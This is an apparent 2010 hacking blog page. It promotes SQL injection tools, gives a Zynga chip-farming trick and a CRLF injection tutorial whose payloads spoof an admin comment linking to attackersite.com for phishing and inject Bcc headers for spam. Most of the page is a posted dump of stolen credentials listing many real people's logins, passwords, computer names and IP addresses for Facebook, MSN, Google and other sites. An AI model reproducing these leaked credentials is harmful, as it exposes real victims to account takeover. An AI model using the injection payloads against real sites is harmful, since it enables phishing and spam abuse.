October 2010 | Learn Cyber Security

Scan websites against XSS with OWASP Scrubbr v1.0




Scrubbr is a BSD-licensed database scanning tool that checks numerous database technologies for the presence of possible stored cross-site scripting attacks. The tool was partially inspired by "Scrawlr", a trimmed-down version of HP’s WebInspect which was released for free after the so-called "asprox" mass-SQL injection bot exploited hundreds of thousands of insecure ASP sites.

Download XSS Scanning Tool Here
.......................................................................................................................................................................................


Read More Add your Comment 1 comments


How To Hack Zynga Poker (Trick)





This method works with IE and Firefox.
Important: I'm doing it with IE but you can follow the same steps to do it with Firefox!

Here we go:

1) Open IE and go to this link :
Code:

2) It's an official Zynga Game Bar. Download it and install it. (It's adware and spyware FREE!)

3) Once you are done installing you'll see this bar:


4) Now click on the 'facebook icon' on the toolbar and you'll get this:


5) Login using your account.

6) Once you login the toolbar kind of refreshed in 5-10 seconds and you see a green 'play now' button.

7) Click that. It'll take you to the Zynga App.

You'll now get $25k, click on the green 'Accept $25k' button :


9) Now close IE (just from the close button)

10) Open IE again. Now click the 'facebook icon' again and it'll again ask you for a login.

11) Now enter a different account and repeat steps 4-8.

12) You'll get 25k AGAIN!

13) You can do this with UNLIMITED accounts and then keep transferring chips to one account.
...........................................................................................................*&^%$#@!!()_................................................. 
...........................................................................................................*&^%$#@!!()_.................................................  
...........................................................................................................*&^%$#@!!()_.................................................  


Read More Add your Comment 1 comments


How To Hack Websites With Hexjector v1.0.7.3 Special Edition



Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties

Features:

1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Detect WAF on the site.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection

Download:Sql Injection Tool Hexjector

...............:"{)(*&^%$#@!###...................................................................................................................................................
...............:"{)(*&^%$#@!###...................................................................................................................................................
...............:"{)(*&^%$#@!###................................................................................................................................................... 


Read More Add your Comment 1 comments


How Hackers Hack Websites With ExploitMyUnion v2.1



ExploitMyUnion is a tool written in Python with a PyQt user interface made to automate sql injection exploitation. 



Features:
Injection via GET/POST/COOKIE.
Quoted injections support.
HTTP proxy support.
SQL 'load_file()' function support.
SQL 'INTO OUTFILE' statement support.
Ability to save/restore injection parameters.
Can dump a table in sql format.

Download This Sql Injection Tool Here

..................><:{_(*&^%$#@!.........................................................................................................................................
..................><:{_(*&^%$#@!........................................................................................................................................
..................><:{_(*&^%$#@!.......................................................................................................................... ..............


Read More Add your Comment 0 comments


CRLF Injections Tutorial




Here one more knowledge step towards injections... with "CRLF Injection" ..Today you will learn ...
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client’s web-cache, hijacking of web pages, defacement and a myriad of other related attacks. A number of years ago a number of CRLF injection vulnerabilities were also discovered in Google’s Adwords web interface.

Today you will learn:
  • What is a CRLF Injection?
  • Vulnerability PoC - Comment System
  • Vulnerability PoC - Email Form
  • Vulnerability PoC - Header Injection
  • Patching
  • Conclusion

What is a CRLF Injection?

Carraige Return Line Feed (CRLF) work due to improper sanatization in user input. The carriage return is essentially the same as hitting 'Enter' or 'Return', creating a new line. The carriage return can be represented in a few different ways: CR, ASCII 13 or r. Both the carriage return and the line feed do essentially the same thing. Although, the line feed is represented as LF, ASCII 10 or n. These commands are printer commands, the line feed tells the printer to feed out one line and a carriage return said the printer carriage should go to the beginning of the current line. In the event you know the operating system of the target machine it will prove useful to know that Windows uses CR/LF but *nix systems only use LF.


Vulnerability PoC - Comment System

To illustrate the first method of CRLF we will be using a hypothetical comment application which is vulnerable to the attack. Let's say our current comment system looks like so:

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....


Keep in mind both of these posts are legitimate. To exploit the vulnerability our attack will craft a post that will make it seem like he's posting as an administrator. He will enter the following into the comment box:

Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to http://attackersite.com/login.php, you should be able to login there.


This extremely simple injection will change the comment output the following result.

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to http://attackersite.com/login.php


As you can clearly see in the example, by posing as an administrator we are able to phish passwords from the unsuspecting users. By inserting our new line character in to the post we can go down a line and pretend to be an administrator. It's a pretty neat trick.


Vulnerability PoC - Email Form

The second and final example involves a script used to send emails to other users. The catch is that you cannot see the real email address of the person you are sending to. To exploit this we can simple insert the following in to the 'Subject' header:

Hey, it's DavenBcc: [email protected]@email.com


This injection will send the email over to [email protected]@email.com AND the person we originally specified in the 'To' column. These mail forms can also be exploited by spammers in order to hide their identity. By using a similar method as above they can'Cc' and 'Bcc' the message to 100's of other people spamming their
inboxes anonymously.


Vulnerability PoC - Header Injection

As an alternative to inserting the carriage return-line feed in to an input box we can also use a program like Achilles to intercept the POST headers and then modify them. Using a similar example as to the Email Form example above we could change our headers like so:

Content-Type: application/x-www-form-urlencoded
Content-Length: 147


name=This+is+a+test+&emai l= [email protected]@coldmail.com&subje ct=Test&header=Header:
[email protected]@thingy.com
CC: [email protected]@meow.com
Bcc:[email protected]. com,
[email protected]. org,
[email protected]@enigmagroup.org
&msg=crlf!


As you can plainly see in the above example we are able to modify the header in order to spam those email addresses.


Patching

The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to $_POST['input']

if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..


I have commented the code so that you can gain an idea of how we are fixing this vulnerability. As you can see it doesn't take much to thwart this vulnerability. Sadly, not many people are implementing such a patch.

Conclusion

Whether you're dealing with a high risk vulnerability (remote file inclusion) or a low risk one, such as this, you always need to be aware of what you're dealing with In creating this article I hoped to enlighten some of you as to how this vulnerability works. I hope you've enjoyed this article.
........................................................................................................!@#$%^&*()_+{}":?><........................
........................................................................................................!@#$%^&*()_+{}":?><........................
........................................................................................................!@#$%^&*()_+{}":?><........................ 


Read More Add your Comment 1 comments


Download Free Real Hide IP v4.0.4.2



                                                                         
Real Hide IP v4.0.4.2 | 5 Mb

Real Hide IP is a software that allows you to anonymously surf the net. Protect your privacy online by clicking the mouse, hiding your real IP-address, to protect themselves from intrusion by hackers.

If you are using Real Hide IP, you will have the option to hide your identity on the network, showing the websites IP-address of the proxy server, which you can choose from a number of available countries. In this way, you block hackers and curious visitors wanting to know everything about you. You can easily switch between real and fake IP. As soon as you stop using Real Hide IP, configure your browser will again usually automatically. The program is compatible with browsers Internet Explorer, FireFox, Opera, Maxthon, MyIE and others.

Key Features

- Hide Your Real IP Address

- Anonymous Web Surfing

- Protect Your Identity Against Hackers

- Un-ban Yourself from Forums or Restricted Websites

- Prevent Websites from Tracking Your Online Activities


Home:

Code:

http:/www.real-hide-ip.com

Download:

Code:
........................................ ........................?<":{)(*&^%$#@!...............................................................................................
........................................ ........................?<":{)(*&^%$#@!...............................................................................................
........................................ ........................?<":{)(*&^%$#@!............................................................................................... 


Read More Add your Comment 1 comments


How to Backup Facebook Data and Download all in a Zip File




Now Facebook is supporting a good new feature! You can make backup all of your Facebook Photos, Links, informations, Wall Posts, Messages, Videos etc in a zip file and download it to save your Facebook data on your computer. So if you loose any of your Facebook contents, you can get them from saved backup file. Let's see how to do this job. 



1. Login to your Facebook account.
2. Now at the top right side, go to Account > Account Settings.
3. Now in the account settings page, You will see a line like "Download Your Information" with "learn more" link . Click on the learn more link.
4. Then you will come across a page like below.



5. Now click on download. And you will be prompted with downland confirmation. Again click on download. Then press ok.
6. Last time facebook will tell you that, "(Your download is currently being generated. You will receive an email when it's ready.)"
7. So after few times you should check your E-Mail account that is associated with this Facebook account. Facebook will send you the download link to thet email address. Click on this link, enter your Facebook password and download the zip file that contains all your Facebook data.
Thanks To Ravi Geniusrk
............................................................................................................................ ..................................................
............................................................................................................................ ..................................................
............................................................................................................................ .................................................. 


Read More Add your Comment 0 comments


How to create a torrent & seed it correctly



In this tutorial I will be showing you how to create & seed a torrent correctly for your ke****/R**T/Movies whatever it may be.

First of all you need to download a torrent client.
I would suggest using uTorrent because it's easy to use.
You can download uTorrent from here: http://utorrent.com
After you install uTorrent open it up go up to the left hand corner of uTorrent and click file > create new torrent


[Image: ngubo6.jpg]

Once you click create new torrent click Add File


[Image: 2r782fl.jpg]

After clicking Add File search your file you want to make a torrent for example I'll use ThreatExpert Application (make sure you check the box next to start seeding before you click Create and Save as


[Image: 2ur2zw5.jpg]

Once you've selected your file and checked the box next to start seeding click the button Create and Save as... a box like this

[Image: bf1a52.jpg]
will appear just click yes, you will get trackers off the site your uploading your torrent to.

Once you've click yes it will then make your file you selected a .torrent file you then save it somewhere as shown in the picture below.


[Image: 28vd3ps.jpg]

Here is what the .torrent file will look like after you create it.


[Image: 21e2g7p.jpg]

Congratulations you've now created your .torrent file to upload to torrent sites.

Now for the seeding part to seed your torrent file.

Upload your .torrent file to a site like http://torrents.sumotorrent.com/upload.php

Click browse find the .torrent file that you just made select the category's, choose a name for your torrent, write in a description something persuading, then click upload.

After doing that then the torrent site will automatically redirect you to your torrent you just uploaded, download it. (open with uTorrent by default)

Right click on the torrent file in uTorrent and click properties in properties near the bottom select initial seeding.


[Image: f351dz.jpg]

After doing that... right click on your torrent file in uTorrent again and select the option Force Start

It will then Force Start and Initially Seed your file...


[Image: 2h3dcmw.jpg]

Once you've uploaded your file to one torrent site... upload it to different torrent sites to get better results of spreading your file.


Read More Add your Comment 1 comments


New logs Facebook/Yahoo/Gmail/Hotmail Account Passwords (Oct/27/2010)




Program: Firefox
Url/Host: http://chevaldetroie.xooit.fr
Login: zippo56240
Password: ewen56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:41
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: lolwut11
Computer: MasterZ
Date: 2010-08-06 18:12:05
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://chevaldetroie.xooit.fr
Login: [email protected]
Password: ewen56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:41
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: 250278
Computer: PATRICIAETBRUNO
Date: 2010-08-07 01:57:41
Ip: 77.193.36.4
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: 0192837465
Computer: MasterZ
Date: 2010-08-06 18:12:04
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.torrent411.com
Login: zippo56240
Password: ewen56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:41
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: system11?
Computer: MasterZ
Date: 2010-08-06 18:12:04
Ip: 76.104.242.170
----------------------------------------------------------
Program: Opera
Url/Host: http://login.e-klase.lv/default.aspx
Login: 210992-11804
Password: y24dzeru
Computer: Arturs-PC
Date: 2010-08-06 18:12:04
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://fr-fr.facebook.com
Login: [email protected]
Password: ewenpistache56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: MasterZ
Date: 2010-08-06 18:12:04
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: [email protected]
Password: ewenpistache56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: Opera
Url/Host: http://screamers.lv/forums/index.php
Login: rolton
Password: arturs
Computer: Arturs-PC
Date: 2010-08-06 18:12:04
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://fr-fr.facebook.com
Login: [email protected]
Password: ewen04092007
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: Opera
Url/Host: http://screamers.lv/
Login: rolton
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:04
Ip: 86.63.164.148
----------------------------------------------------------
Program: Opera
Url/Host: http://exs.lv/
Login: Nikki
Password: arturs
Computer: Arturs-PC
Date: 2010-08-06 18:12:04
Ip: 86.63.164.148
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DESKTOP
Date: 2010-08-07 01:57:40
Ip: 190.157.216.86
----------------------------------------------------------
Program: Opera
Url/Host: http://www.draugiem.lv
Login: login345
Password: pass345
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: [email protected]
Password: ewen04092007
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://mu.ownage.biz/
Login: Nikki
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.guerretribale.fr
Login: zippo56240
Password: ewen56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: Opera
Url/Host: http://exs.lv/
Login: sv3rige ligh
Password: arturs
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://guerretribale.fr
Login: zippo56240
Password: ewen56240
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: Opera
Url/Host: http://www.draugiem.lv/index.php
Login: [email protected]
Password: login
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: cadenito1954
Computer: DESKTOP
Date: 2010-08-07 01:57:40
Ip: 190.157.216.86
----------------------------------------------------------
Program: FileZilla
Url/Host: instantdedi32.serverffs.com
Login: root
Password: PZojc8AZojd3
Computer: MasterZ
Date: 2010-08-06 18:12:11
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: mariepaule
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.prizee.com
Login: titi0561
Password: pierre
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: sandra
Computer: ZIPPO-D1FDECC56
Date: 2010-08-07 01:57:40
Ip: 90.32.162.8
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: alicia
Computer: PC-de-lionel
Date: 2010-08-07 01:57:38
Ip: 77.192.114.250
----------------------------------------------------------
Program: Firefox
Url/Host: http://fr.vente-privee.com
Login: [email protected]
Password: lasoude
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:38
Ip: 84.99.219.28
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://www.gign.lv/logout
Login: Nikki
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://www.gign.lv/logout
Login: SteRn
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://192.168.1.1/
Login: admin
Password: admin
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: https://www.destockjeans.fr
Login: [email protected]
Password: boucine
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:38
Ip: 84.99.219.28
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.destockjeans.fr
Login: [email protected]
Password: boucine
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:38
Ip: 84.99.219.28
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://www.draugiem.lv/friend/
Login: [email protected]
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: [email protected]
Password: bibou2703
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:38
Ip: 84.99.219.28
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://munidraugi.lv/reject
Login: [email protected]
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:02
Ip: 86.63.164.148
----------------------------------------------------------
Program: Google Chrome
Url/Host: https://www.google.com/accounts/ServiceLogin
Login: Grafomans
Password: ultimate
Computer: Arturs-PC
Date: 2010-08-06 18:12:03
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://steam-hack.com
Login: lasoude
Password: hamsun
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Firefox
Url/Host: http://forum.cdaction.pl
Login: hamsun09
Password: lasoude
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://exs.lv/
Login: Nikki
Password: arturs
Computer: Arturs-PC
Date: 2010-08-06 18:12:02
Ip: 86.63.164.148
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://newoutlaw.org/login1.php
Login: ShK
Password: cgJDm4NgfQ
Computer: Arturs-PC
Date: 2010-08-06 18:12:02
Ip: 86.63.164.148
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://screamers.lv/forums/index.php
Login: rolton
Password: arturs
Computer: Arturs-PC
Date: 2010-08-06 18:12:02
Ip: 86.63.164.148
----------------------------------------------------------
Program: Firefox
Url/Host: http://login.live.com
Login: [email protected]
Password: yamaha
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Google Chrome
Url/Host: http://www.callofduty.com/login
Login: Password
Password: Panasonic!2!
Computer: MAISON
Date: 2010-08-06 18:12:02
Ip: 70.82.33.180
----------------------------------------------------------
Program: Firefox
Url/Host: http://farmerama.tech.uk.msn.com
Login: marine112
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:02
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.deezer.com
Login: [email protected]
Password: hamsun
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.farmerama.fr
Login: marine112
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:02
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: https://www6.king.com
Login: jocelyne56
Password: 6ygbjssgtu
Computer: jocelyne-PC
Date: 2010-08-06 18:12:02
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://forum.wawa-mania.ws
Login: mathieu_09
Password: lasoude
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Firefox
Url/Host: http://login.live.com
Login: [email protected]
Password: hamsun09
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Firefox
Url/Host: https://www.pole-emploi.fr
Login: leon562512
Password: micarvormx90
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.farmerama.bigpoint.com
Login: marine112
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: [email protected]
Password: boucine
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: scorpion_999
Computer: André-PC
Date: 2010-08-06 18:11:58
Ip: 84.91.14.102
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: ilovekate
Computer: N-B5C96962FAA54
Date: 2010-08-06 18:11:58
Ip: 217.125.185.94
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: hamsun09
Computer: LesBenyamina-PC
Date: 2010-08-07 01:57:37
Ip: 84.99.219.28
----------------------------------------------------------
Program: Firefox
Url/Host: http://login.live.com
Login: [email protected]
Password: maximelachance5
Computer: MAISON
Date: 2010-08-06 22:55:45
Ip: 70.82.33.180
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: 0506486467
Computer: ROOM
Date: 2010-08-06 18:11:59
Ip: 84.229.79.243
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: MAISON
Date: 2010-08-06 22:55:44
Ip: 70.82.33.180
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: maximelachance5
Computer: MAISON
Date: 2010-08-06 22:55:44
Ip: 70.82.33.180
----------------------------------------------------------
Program: Firefox
Url/Host: https://www.google.com
Login: [email protected]
Password: greekgod
Computer: jonty-PC
Date: 2010-08-06 20:56:25
Ip: 196.209.20.207
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: 68068918097923a
Computer: MAISON
Date: 2010-08-06 18:11:59
Ip: 70.82.33.180
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: [email protected]
Password: greekgod
Computer: jonty-PC
Date: 2010-08-06 20:56:24
Ip: 196.209.20.207
----------------------------------------------------------
Program: Firefox
Url/Host: http://webjerks.de
Login: -=|FS|=-Storm
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:51
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.terror-heads.de
Login: Sebastian
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:51
Ip: 80.143.217.221
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: jocelyne-PC
Date: 2010-08-06 18:12:00
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.twowar.com
Login: Masupilami
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:51
Ip: 80.143.217.221
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: micarvormx900
Computer: jocelyne-PC
Date: 2010-08-06 18:12:00
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://zimbra.free.fr
Login: jpnp56
Password: marine
Computer: jocelyne-PC
Date: 2010-08-06 18:12:00
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://twowar.com
Login: Masupilami
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:51
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: https://msnia.login.live.com
Login:
Password: micarvormx900
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.planete-lolo.com
Login: breakeur56
Password: perghtnesir
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://de-de.facebook.com
Login: [email protected]
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:50
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: https://www.google.com
Login: [email protected]
Password: marine56
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.skyrock.com
Login: 112marine
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://de.justin.tv
Login: sebi156
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:50
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://login.live.com
Login: [email protected]
Password: micarvormx900
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.ohmydollz.com
Login: mamalagirldu56
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://web.de
Login: mybfbc2
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:50
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://fr.farmerama.bigpoint.com
Login: marine112
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: https://auth.freerealms.com
Login: marine112bg
Password: 1121997marine
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://web.de
Login: [email protected]
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:49
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://farmerama.myplaycity.ru
Login: marine112
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: Firefox
Url/Host: http://farmerama.bigpoint.com
Login: marine112
Password: 1121997
Computer: jocelyne-PC
Date: 2010-08-06 18:12:01
Ip: 82.246.50.237
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: lolwut11
Computer: MasterZ
Date: 2010-08-06 18:12:06
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: https://www.google.com
Login: [email protected]
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:49
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://web.de
Login: gamerplace1
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:49
Ip: 80.143.217.221
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: MasterZ
Date: 2010-08-06 18:12:06
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.ingamers.de
Login: Kennwort
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:48
Ip: 80.143.217.221
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: 0192837465
Computer: MasterZ
Date: 2010-08-06 18:12:07
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://web.de
Login: gamernetwork1
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:48
Ip: 80.143.217.221
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: nxypitz02
Computer: MasterZ
Date: 2010-08-06 18:12:07
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://zattoo.com
Login: [email protected]
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:48
Ip: 80.143.217.221
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: MasterZ
Date: 2010-08-06 18:12:07
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: MasterZ
Date: 2010-08-06 18:12:07
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: lolwut11
Computer: MasterZ
Date: 2010-08-06 18:12:08
Ip: 76.104.242.170
----------------------------------------------------------
Program: No-Ip
Url/Host:
Login: [email protected]
Password: 0192837465
Computer: MasterZ
Date: 2010-08-06 18:12:08
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.spickmich.de
Login: [email protected]
Password: darthvader
Computer: Sebastian-PC
Date: 2010-08-06 20:16:48
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.schuelervz.net
Login: [email protected]
Password: odonkor
Computer: Sebastian-PC
Date: 2010-08-06 20:16:48
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.schuelervz.net
Login: [email protected]
Password: odonkor
Computer: Sebastian-PC
Date: 2010-08-06 20:16:48
Ip: 80.143.217.221
----------------------------------------------------------
Program: DynDNS
Url/Host:
Login: sebi1561
Password: damDuzoe
Computer: Sebastian-PC
Date: 2010-08-06 20:16:47
Ip: 80.143.217.221
----------------------------------------------------------
Program: Firefox
Url/Host: http://member.ijji.com
Login: RAWRZZ2
Password: KEVINBOY178
Computer: PC_van_boy
Date: 2010-08-06 20:16:45
Ip: 77.167.4.188
----------------------------------------------------------
Program: Firefox
Url/Host: http://gunbound.softnyx.net
Login: highemokid178
Password: kevinboy178
Computer: PC_van_boy
Date: 2010-08-06 20:16:44
Ip: 77.167.4.188
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
